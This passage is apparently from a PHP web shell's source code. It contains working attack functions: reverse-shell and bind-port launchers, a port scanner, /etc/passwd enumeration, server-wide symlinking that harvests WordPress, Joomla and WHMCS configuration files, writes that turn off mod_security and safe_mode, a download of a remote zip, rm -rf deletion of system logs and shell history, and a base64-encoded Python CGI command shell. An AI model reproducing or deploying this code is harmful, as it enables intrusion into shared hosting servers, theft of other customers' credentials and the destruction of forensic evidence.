value=\"'.(empty(\$_POST['sql_pass'])?'':htmlspecialchars(\$_POST['sql_pass'])).'\"></td>\r\n <td>';\r\n \$tmp = \"<input type=text name=sql_base value=''>\";\r\n if(isset(\$_POST['sql_host'])){ if(\$db->connect(\$_POST['sql_host'], \$_POST['sql_login'], \$_POST['sql_pass'], \$_POST['sql_base'])) { switch(\$_POST['charset']) { case \"Windows-1251\": \$db->setCharset('cp1251');\r\n break;\r\n case \"UTF-8\": \$db->setCharset('utf8');\r\n break;\r\n case \"KOI8-R\": \$db->setCharset('koi8r');\r\n break;\r\n case \"KOI8-U\": \$db->setCharset('koi8u');\r\n break;\r\n case \"cp866\": \$db->setCharset('cp866');\r\n break;\r\n } \$db->listDbs();\r\n echo \"<select name=sql_base><option value=''></option>\";\r\n while(\$item = \$db->fetch()) { list(\$key, \$value) = each(\$item);\r\n echo '<option value=\"'.\$value.'\" '.(\$value==\$_POST['sql_base']?'selected':'').'>'.\$value.'</option>';\r\n } echo '</select>';\r\n } else echo \$tmp;\r\n }else echo \$tmp;\r\n echo '</td>\r\n <td><input type=submit value=\">>\"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\'select\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\'tbl[]\\'].length;\r\n++i)\r\n document.sf.elements[\\'tbl[]\\'][i].checked = !document.sf.elements[\\'tbl[]\\'][i].checked;\r\n\r\n }\r\n </script>';\r\n if(isset(\$db) && \$db->link){ echo \"<br/><table width=100% cellpadding=2 cellspacing=0>\";\r\n if(!empty(\$_POST['sql_base'])){ \$db->selectdb(\$_POST['sql_base']);\r\n echo \"<tr><td width=1 style='border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n'><span>Tables:</span><br><br>\";\r\n \$tbls_res = \$db->listTables();\r\n while(\$item = \$db->fetch(\$tbls_res)) { list(\$key, \$value) = each(\$item);\r\n \$n = \$db->fetch(\$db->query('SELECT COUNT(*) as n FROM '.\$value.''));\r\n \$value = htmlspecialchars(\$value);\r\n echo \"<nobr><input type='checkbox' name='tbl[]' value='\".\$value.\"'> \r\n<a href=# onclick=\\\"st('\".\$value.\"')\\\">\".\$value.\"</a> (\".\$n['n'].\")</nobr><br>\";\r\n } echo \"<input type='checkbox' onclick='is();\r\n'> <input type=button value='Dump' onclick='document.sf.p2.value=\\\"download\\\";\r\ndocument.sf.submit();\r\n'></td><td style='border-top:2px solid #666;\r\n'>\";\r\n if(@\$_POST['p1'] == 'select') { \$_POST['p1'] = 'query';\r\n \$db->query('SELECT COUNT(*) as n FROM '.\$_POST['p2'].'');\r\n \$num = \$db->fetch();\r\n \$num = \$num['n'];\r\n echo \"<span>\".\$_POST['p2'].\"</span> (\$num) \";\r\n for(\$i=0;\r\n\$i<(\$num/30);\r\n\$i++) if(\$i != (int)\$_POST['p3']) echo \"<a href='#' onclick='st(\\\"\".\$_POST['p2'].\"\\\", \$i)'>\",(\$i+1),\"</a> \";\r\n else echo (\$i+1),\" \";\r\n if(\$_POST['type']=='pgsql') \$_POST['p3'] = 'SELECT * FROM '.\$_POST['p2'].' LIMIT 30 OFFSET '.(\$_POST['p3']*30);\r\n else \$_POST['p3'] = 'SELECT * FROM `'.\$_POST['p2'].'` LIMIT '.(\$_POST['p3']*30).',30';\r\n echo \"<br><br>\";\r\n } if((@\$_POST['p1'] == 'query') && !empty(\$_POST['p3'])) { \$db->query(@\$_POST['p3']);\r\n if(\$db->res !== false) { \$title = false;\r\n echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';\r\n \$line = 1;\r\n while(\$item = \$db->fetch()) { if(!\$title) { echo '<tr>';\r\n foreach(\$item as \$key => \$value) echo '<th>'.\$key.'</th>';\r\n reset(\$item);\r\n \$title=true;\r\n echo '</tr><tr>';\r\n \$line = 2;\r\n } echo '<tr class=\"l'.\$line.'\">';\r\n \$line = \$line==1?2:1;\r\n foreach(\$item as \$key => \$value) { if(\$value == null) echo '<td><i>null</i></td>';\r\n else echo '<td>'.nl2br(htmlspecialchars(\$value)).'</td>';\r\n } echo '</tr>';\r\n } echo '</table>';\r\n } else { echo '<div><b>Error:</b> '.htmlspecialchars(\$db->error()).'</div>';\r\n } } echo \"<br><textarea name='p3' style='width:100%;\r\nheight:100px'>\".@htmlspecialchars(\$_POST['p3']).\"</textarea><br/><input type=submit value='Execute'>\";\r\n echo \"</td></tr>\";\r\n } echo \"</table></form><br/><form onsubmit='document.sf.p1.value=\\\"loadfile\\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>\";\r\n if(@\$_POST['p1'] == 'loadfile') { \$db->query(\"SELECT LOAD_FILE('\".addslashes(\$_POST['p2']).\"') as file\");\r\n \$file = \$db->fetch();\r\n echo '<pre class=ml1>'.htmlspecialchars(\$file['file']).'</pre>';\r\n } } echo '</div>';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n \$back_connect_c=\"\";\r\n \$back_connect_p=\"\";\r\n \$bind_port_c=\"\";\r\n \$bind_port_p=\"\";\r\n echo '<h1>Network tools</h1><div class=content>\r\n <form name=\\'nfp\\' onSubmit=\"g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n\">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\'text\\' name=\\'port\\' value=\\'443\\'> Password: <input type=\\'text\\' name=\\'pass\\' value=\\'smurf\\'> Using: <select name=\"using\"><option value=\\'bpc\\'>C</option><option value=\\'bpp\\'>Perl</option></select> <input type=submit value=\">>\">\r\n </form>\r\n <form name=\\'nfp\\' onSubmit=\"g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n\">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\'text\\' name=\\'server\\' value=\"'.\$_SERVER['REMOTE_ADDR'].'\"> Port: <input type=\\'text\\' name=\\'port\\' value=\\'443\\'> Using: <select name=\"using\"><option value=\\'bcc\\'>C</option><option value=\\'bcp\\'>Perl</option></select> <input type=submit value=\">>\">\r\n </form><br>';\r\n if(isset(\$_POST['p1'])) { function cf(\$f,\$t) { \$w=@fopen(\$f,\"w\") or @function_exists('file_put_contents');\r\n if(\$w) { @fwrite(\$w,@base64_decode(\$t)) or @fputs(\$w,@base64_decode(\$t)) or @file_put_contents(\$f,@base64_decode(\$t));\r\n @fclose(\$w);\r\n } } if(\$_POST['p1'] == 'bpc') { cf(\"/tmp/bp.c\",\$bind_port_c);\r\n \$out = ex(\"gcc -o /tmp/bp /tmp/bp.c\");\r\n @unlink(\"/tmp/bp.c\");\r\n \$out .= ex(\"/tmp/bp \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n echo \"<pre class=ml1>\$out\\n\".ex(\"ps aux | grep bp\").\"</pre>\";\r\n } if(\$_POST['p1'] == 'bpp') { cf(\"/tmp/bp.pl\",\$bind_port_p);\r\n \$out = ex(which(\"perl\").\" /tmp/bp.pl \".\$_POST['p2'].\" &\");\r\n echo \"<pre class=ml1>\$out\\n\".ex(\"ps aux | grep bp.pl\").\"</pre>\";\r\n } if(\$_POST['p1'] == 'bcc') { cf(\"/tmp/bc.c\",\$back_connect_c);\r\n \$out = ex(\"gcc -o /tmp/bc /tmp/bc.c\");\r\n @unlink(\"/tmp/bc.c\");\r\n \$out .= ex(\"/tmp/bc \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n echo \"<pre class=ml1>\$out\\n\".ex(\"ps aux | grep bc\").\"</pre>\";\r\n } if(\$_POST['p1'] == 'bcp') { cf(\"/tmp/bc.pl\",\$back_connect_p);\r\n \$out = ex(which(\"perl\").\" /tmp/bc.pl \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n echo \"<pre class=ml1>\$out\\n\".ex(\"ps aux | grep bc.pl\").\"</pre>\";\r\n } } echo '</div>';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo '<h1>Port Scanner</h1>';\r\n echo '<div class=\"content\">';\r\n echo '<form action=\"\" method=\"post\">';\r\n if(isset(\$_POST['host']) && is_numeric(\$_POST['end']) && is_numeric(\$_POST['start'])){ \$start = strip_tags(\$_POST['start']);\r\n \$end = strip_tags(\$_POST['end']);\r\n \$host = strip_tags(\$_POST['host']);\r\n for(\$i = \$start;\r\n \$i<=\$end;\r\n \$i++){ \$fp = @fsockopen(\$host, \$i, \$errno, \$errstr, 3);\r\n if(\$fp){ echo 'Port '.\$i.' is <font color=green>open</font><br>';\r\n } flush();\r\n } } else { echo '<br /><br /><center><input type=\"hidden\" name=\"a\" value=\"PortScanner\"><input type=\"hidden\" name=p1><input type=\"hidden\" name=\"p2\">\r\n <input type=\"hidden\" name=\"c\" value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=\"hidden\" name=\"charset\" value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n Host: <input type=\"text\" name=\"host\" value=\"localhost\"/><br /><br />\r\n Port start: <input type=\"text\" name=\"start\" value=\"0\"/><br /><br />\r\n Port end:<input type=\"text\" name=\"end\" value=\"5000\"/><br /><br />\r\n <input type=\"submit\" value=\"Scan Ports\" />\r\n </form></center><br /><br />';\r\n } echo '</div>';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo '<h1>Readable Dirs</h1>';\r\n echo '<div class=\"content\">';\r\n \$sm = ini_get('safe_mode');\r\n if(\$sm) { echo '<br /><b>Error: safe_mode = on</b><br /><br />';\r\n } else { @\$passwd = fopen('/etc/passwd','r');\r\n if (!\$passwd) { echo '<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />';\r\n } else { \$pub = array();\r\n \$users = array();\r\n \$conf = array();\r\n \$i = 0;\r\n while(!feof(\$passwd)) { \$str = fgets(\$passwd);\r\n if (\$i > 35) { \$pos = strpos(\$str,':');\r\n \$username = substr(\$str,0,\$pos);\r\n \$dirz = '/home/'.\$username.'/public_html/';\r\n if ((\$username != '')) { if (is_readable(\$dirz)) { array_push(\$users,\$username);\r\n array_push(\$pub,\$dirz);\r\n } } } \$i++;\r\n } echo '<br><br>';\r\n echo \"[+] Founded \".sizeof(\$users).\" entrys in /etc/passwd\\n\".\"<br />\";\r\n echo \"[+] Founded \".sizeof(\$pub).\" readable public_html directories\\n\".\"<br /><br /><br />\";\r\n foreach (\$users as \$user) { \$path = \"/home/\$user/public_html/\";\r\n echo \$path.\"<br>\";\r\n } echo \"<br /><br /><br />[+] Complete...\\n\".\"<br />\";\r\n } } echo '</div>';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo '<h1>Symlink</h1>';\r\n \$furl = 'http://'.\$_SERVER['SERVER_NAME'].\$_SERVER['REQUEST_URI'];\r\n \$expld = explode('/',\$furl );\r\n \$burl =str_replace(end(\$expld),'',\$furl);\r\n echo '<div class=\"content\"><center>\r\n <h3>[ <a href=\"#\" onclick=\"g(\\'symlink\\',null,\\'website\\',null)\">Domains</a> ] - \r\n [ <a href=\"#\" onclick=\"g(\\'symlink\\',null,\\'whole\\',null)\">Whole Server Symlink</a> ] - \r\n [ <a href=\"#\" onclick=\"g(\\'symlink\\',null,\\'config\\',null)\">Config files symlink</a> ]</h3></center>';\r\n if(isset(\$_POST['p1']) && \$_POST['p1']=='website') { echo \"<center>\";\r\n \$d0mains = @file(\"/etc/named.conf\");\r\n if(!\$d0mains){ echo \"<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>\";\r\n } else { echo \"<table align=center class='main' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>\";\r\n \$unk = array();\r\n foreach(\$d0mains as \$d0main){ if(@eregi(\"zone\",\$d0main)){ preg_match_all('#zone \"(.*)\"#', \$d0main, \$domains);\r\n flush();\r\n if(strlen(trim(\$domains[1][0])) > 2){ \$unk[] = \$domains[1][0];\r\n flush();\r\n } } } \$count=1;\r\n \$unk = array_unique(\$unk);\r\n \$l=0;\r\n foreach(\$unk as \$d){ \$user = posix_getpwuid(@fileowner(\"/etc/valiases/\".\$d));\r\n echo \"<tr\".(\$l?' class=l1':'').\"><td>\".\$count.\"</td><td><a href=http://\".\$d.\"/>\".\$d.\"</a></td><td>\".\$user['name'].\"</td></tr>\";\r\n flush();\r\n \$count++;\r\n \$l=\$l?0:1;\r\n } echo \"</table>\";\r\n } echo \"</center>\";\r\n } if(isset(\$_POST['p1']) && \$_POST['p1']=='whole') { echo \"<center>\";\r\n @mkdir('sym',0777);\r\n \$hdt = \"Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any\";\r\n \$hfp =@fopen ('sym/.htaccess','w');\r\n fwrite(\$hfp ,\$hdt);\r\n if(function_exists('symlink')) { @symlink('/','sym/root');\r\n } \$d0mains = @file('/etc/named.conf');\r\n if(!\$d0mains) { echo \"<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>\";\r\n } else { echo \"<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>\";\r\n \$count=1;\r\n \$mck = array();\r\n foreach(\$d0mains as \$d0main){ if(@eregi('zone',\$d0main)){ preg_match_all('#zone \"(.*)\"#',\$d0main,\$domain);\r\n flush();\r\n if(strlen(trim(\$domain[1][0])) >2){ \$mck[] = \$domain[1][0];\r\n } } } \$mck = array_unique(\$mck);\r\n \$l=0;\r\n foreach(\$mck as \$d) { \$user = posix_getpwuid(@fileowner('/etc/valiases/'.\$d));\r\n \$ddt = \$user['name'];\r\n \$ddt = \$d;\r\n if(@eregi(\"\\.ir\",\$d) or @eregi(\"\\.il\",\$d)) { \$ddt = \"<div style=' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n '>\".\$d.'</div>';\r\n } echo \"<tr\".(\$l?' class=l1':'').\"><td>\".\$count++.\"</td><td><a target='_blank' href=http://\".\$d.'/>'.\$ddt.' </a></td><td>'.\$user['name'].\"</td><td><a href='sym/root/home/\".\$user['name'].\"/public_html' target='_blank'>symlink </a></td></tr>\";\r\n flush();\r\n \$l=\$l?0:1;\r\n } echo '</table>';\r\n } echo \"</center>\";\r\n } if(isset(\$_POST['p1']) && \$_POST['p1']=='config') { echo \"<center>\";\r\n @mkdir('sym',0777);\r\n \$hdt = \"Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any\";\r\n \$hfp = @fopen ('sym/.htaccess','w');\r\n @fwrite(\$hfp ,\$hdt);\r\n if(function_exists('symlink')) { @symlink('/','sym/root');\r\n } \$d0mains = @file('/etc/named.conf');\r\n if(!\$d0mains) { echo \"<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>\";\r\n } else { echo \"<table align='center' width='40%' class='main' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>\";\r\n \$count = 1;\r\n \$l=0;\r\n foreach(\$d0mains as \$d0main){ if(@eregi('zone',\$d0main)){ preg_match_all('#zone \"(.*)\"#',\$d0main,\$domain);\r\n flush();\r\n if(strlen(trim(\$domain[1][0]))>2){ \$user = posix_getpwuid(@fileowner('/etc/valiases/'.\$domain[1][0]));\r\n \$c1 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/wp-config.php';\r\n \$ch01 = get_headers(\$c1);\r\n \$cf01 = \$ch01[0];\r\n \$c2 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/blog/wp-config.php';\r\n \$ch02 = get_headers(\$c2);\r\n \$cf02 = \$ch02[0];\r\n \$c3 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/configuration.php';\r\n \$ch03 = get_headers(\$c3);\r\n \$cf03 = \$ch03[0];\r\n \$c4 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/joomla/configuration.php';\r\n \$ch04 = get_headers(\$c4);\r\n \$cf04 = \$ch04[0];\r\n \$c5 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/includes/config.php';\r\n \$ch05 = get_headers(\$c5);\r\n \$cf05 = \$ch05[0];\r\n \$c6 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/vb/includes/config.php';\r\n \$ch06 = get_headers(\$c6);\r\n \$cf06 = \$ch06[0];\r\n \$c7 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/forum/includes/config.php';\r\n \$ch07 = get_headers(\$c7);\r\n \$cf07 = \$ch07[0];\r\n \$c8 = \$burl.'/sym/root/home/'.\$user['name'].'public_html/clients/configuration.php';\r\n \$ch08 = get_headers(\$c8);\r\n \$cf08 = \$ch08[0];\r\n \$c9 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/support/configuration.php';\r\n \$ch09 = get_headers(\$c9);\r\n \$cf09 = \$ch09[0];\r\n \$c10 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/client/configuration.php';\r\n \$ch10 = get_headers(\$c10);\r\n \$cf10 = \$ch10[0];\r\n \$c11 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/submitticket.php';\r\n \$ch11 = get_headers(\$c11);\r\n \$cf11 = \$ch11[0];\r\n \$c12 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/client/configuration.php';\r\n \$ch12 = get_headers(\$c12);\r\n \$cf12 = \$ch12[0];\r\n \$c13 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/includes/configure.php';\r\n \$ch13 = get_headers(\$c13);\r\n \$cf13 = \$ch13[0];\r\n \$c14 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/include/app_config.php';\r\n \$ch14 = get_headers(\$c14);\r\n \$cf14 = \$ch14[0];\r\n \$c15 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/sites/default/settings.php';\r\n \$ch15 = get_headers(\$c15);\r\n \$cf15 = \$ch15[0];\r\n \$out = ' \r\n';\r\n if(strpos(\$cf01,'200') == true) { \$out = \"<a href='\".\$c1.\"' target='_blank'>Wordpress</a>\";\r\n } elseif(strpos(\$cf02,'200') == true) { \$out = \"<a href='\".\$c2.\"' target='_blank'>Wordpress</a>\";\r\n } elseif(strpos(\$cf03,'200') == true && strpos(\$cf11,'200') == true) { \$out = \" <a href='\".\$c11.\"' target='_blank'>WHMCS</a>\";\r\n } elseif(strpos(\$cf09,'200') == true) { \$out = \" <a href='\".\$c9.\"' target='_blank'>WHMCS</a>\";\r\n } elseif(strpos(\$cf10,'200') == true) { \$out = \" <a href='\".\$c10.\"' target='_blank'>WHMCS</a>\";\r\n } elseif(strpos(\$cf03,'200') == true) { \$out = \" <a href='\".\$c3.\"' target='_blank'>Joomla</a>\";\r\n } elseif(strpos(\$cf04,'200') == true) { \$out = \" <a href='\".\$c4.\"' target='_blank'>Joomla</a>\";\r\n } elseif(strpos(\$cf05,'200') == true) { \$out = \" <a href='\".\$c5.\"' target='_blank'>vBulletin</a>\";\r\n } elseif(strpos(\$cf06,'200') == true) { \$out = \" <a href='\".\$c6.\"' target='_blank'>vBulletin</a>\";\r\n } elseif(strpos(\$cf07,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>vBulletin</a>\";\r\n } elseif(strpos(\$cf08,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>Client Area</a>\";\r\n } elseif(strpos(\$cf12,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>Client Area</a>\";\r\n } elseif(strpos(\$cf13,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>osCommerce/Zen Cart</a>\";\r\n } elseif(strpos(\$cf14,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>Magento</a>\";\r\n } elseif(strpos(\$cf15,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>Drupal</a>\";\r\n } else { continue;\r\n } echo '<tr'.(\$l?' class=l1':'').'><td>'.\$count++.'</td><td><a href=http://www.'.\$domain[1][0].'/>'.\$domain[1][0].'</a></td><td>'.\$user['name'].'</td><td>'.\$out.'</td></tr>';\r\n flush();\r\n \$l=\$l?0:1;\r\n } } } echo \"</table>\";\r\n } echo \"</center>\";\r\n } echo \"</div>\";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo '<h1>Safe Mode</h1>';\r\n echo '<div class=\"content\">';\r\n echo \"<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| \".\$GLOBALS['cwd'].\" |<br><br />\";\r\n echo '<a href=# onclick=\"g(null,null,\\'php.ini\\',null)\">| PHP.INI | </a><a href=# onclick=\"g(null,null,null,\\'ini\\')\">| .htaccess(Mod) | </a><a href=# onclick=\"g(null,null,null,null,\\'sh\\')\">| .htaccess(perl) | </a></center>';\r\n if(!empty(\$_POST['p2']) && isset(\$_POST['p2'])) { \$fil=fopen(\$GLOBALS['cwd'].\".htaccess\",\"w\");\r\n fwrite(\$fil,'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>');\r\n fclose(\$fil);\r\n } if(!empty(\$_POST['p1'])&& isset(\$_POST['p1'])) { \$fil=fopen(\$GLOBALS['cwd'].\"php.ini\",\"w\");\r\n fwrite(\$fil,'safe_mode=OFF\r\n disable_functions=NONE');\r\n fclose(\$fil);\r\n } if(!empty(\$_POST['p3']) && isset(\$_POST['p3'])) { \$fil=fopen(\$GLOBALS['cwd'].\".htaccess\",\"w\");\r\n fwrite(\$fil,'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl');\r\n fclose(\$fil);\r\n } echo \"<br><br /><br /></div>\";\r\n echo '</div>';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists('yazilimlar/sqlbuddy/index.php')){ \$dizin = 'https://byr00t.co/vb/sqlbuddy.zip';\r\n function dosya_indir(\$link,\$name=null) { \$link_info = pathinfo(\$link);\r\n \$uzanti = strtolower(\$link_info['extension']);\r\n \$file = (\$name) ? \$name.'.'.\$uzanti : \$link_info['basename'];\r\n \$curl = curl_init(\$link);\r\n \$fopen = fopen(\$file,'w');\r\n curl_setopt(\$curl, CURLOPT_HEADER,0);\r\n curl_setopt(\$curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt(\$curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt(\$curl, CURLOPT_FILE, \$fopen);\r\n curl_exec(\$curl);\r\n curl_close(\$curl);\r\n fclose(\$fopen);\r\n } dosya_indir(\$dizin, \"sqlbuddy\");\r\n \$zip = new ZipArchive();\r\n \$file = 'sqlbuddy.zip';\r\n \$zip->open(\$file);\r\n \$cikar = \$zip->extractTo('yazilimlar/');\r\n if(file_exists('sqlbuddy.zip')){ @unlink('sqlbuddy.zip');\r\n } if(\$cikar){ echo \"<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> \";\r\n } else{ echo '<div class=\"alert alert-danger\"><strong>Hata!</strong> Dosya indirilirken kritik bir hata olu\xc3\x85\xc5\xb8tu.</div>';\r\n } } elseif(file_exists('yazilimlar/sqlbuddy/index.php')){ echo \"<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> \";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo '<h1>Delete Logs</h1>';\r\n function cmdExe(\$in) { \$out = '';\r\n if (function_exists('passthru')) { ob_start();\r\n @passthru(\$in);\r\n \$out = ob_get_clean();\r\n } else if (function_exists('exec')) { @exec(\$in,\$out);\r\n \$out = @join(\"\\n\",\$out);\r\n } elseif (function_exists('system')) { ob_start();\r\n @system(\$in);\r\n \$out = ob_get_clean();\r\n } elseif (function_exists('shell_exec')) { \$out = shell_exec(\$in);\r\n } elseif (is_resource(\$f = @popen(\$in,\"r\"))) { \$out = \"\";\r\n while(!@feof(\$f)) \$out .= fread(\$f,1024);\r\n pclose(\$f);\r\n } return \$out;\r\n } cmdExe(\"rm -rf /tmp/logs\");\r\n cmdExe(\"rm -rf /root/.ksh_history\");\r\n cmdExe(\"rm -rf /root/.bash_history\");\r\n cmdExe(\"rm -rf /root/.bash_logout\");\r\n cmdExe(\"rm -rf /usr/local/apache/logs\");\r\n cmdExe(\"rm -rf /usr/local/apache/log\");\r\n cmdExe(\"rm -rf /var/apache/logs\");\r\n cmdExe(\"rm -rf /var/apache/log\");\r\n cmdExe(\"rm -rf /var/run/utmp\");\r\n cmdExe(\"rm -rf /var/logs\");\r\n cmdExe(\"rm -rf /var/log\");\r\n cmdExe(\"rm -rf /var/adm\");\r\n cmdExe(\"rm -rf /etc/wtmp\");\r\n cmdExe(\"rm -rf /etc/utmp\");\r\n cmdExe(\"rm -rf \$HISTFILE\");\r\n cmdExe(\"rm -rf /var/log/lastlog\");\r\n cmdExe(\"rm -rf /var/log/wtmp\");\r\n echo '<div style=\"padding:5px;\r\n\">\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /tmp/logs <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /root/.ksh_history <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /root/.bash_history <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /usr/local/apache/log <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/apache/logs <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/apache/log <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/run/utmp <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/adm <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /etc/wtmp <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> \$HISTFILE<br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/log/lastlog <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/log/wtmp <br>\r\n </div>';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir('python')){ mkdir('python', 0755);\r\n } chdir('python');\r\n\$kokdosya = \".htaccess\";\r\n \$dosya_adi = \"\$kokdosya\";\r\n \$dosya = fopen (\$dosya_adi , 'w') or die (\"Dosya aç\r\nı\r\nlamadı\r\n!\");\r\n \$metin = \"AddHandler cgi-script .r00t\";\r\n fwrite ( \$dosya , \$metin ) ;\r\n fclose (\$dosya);\r\n \$pythonp = 'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1Zlc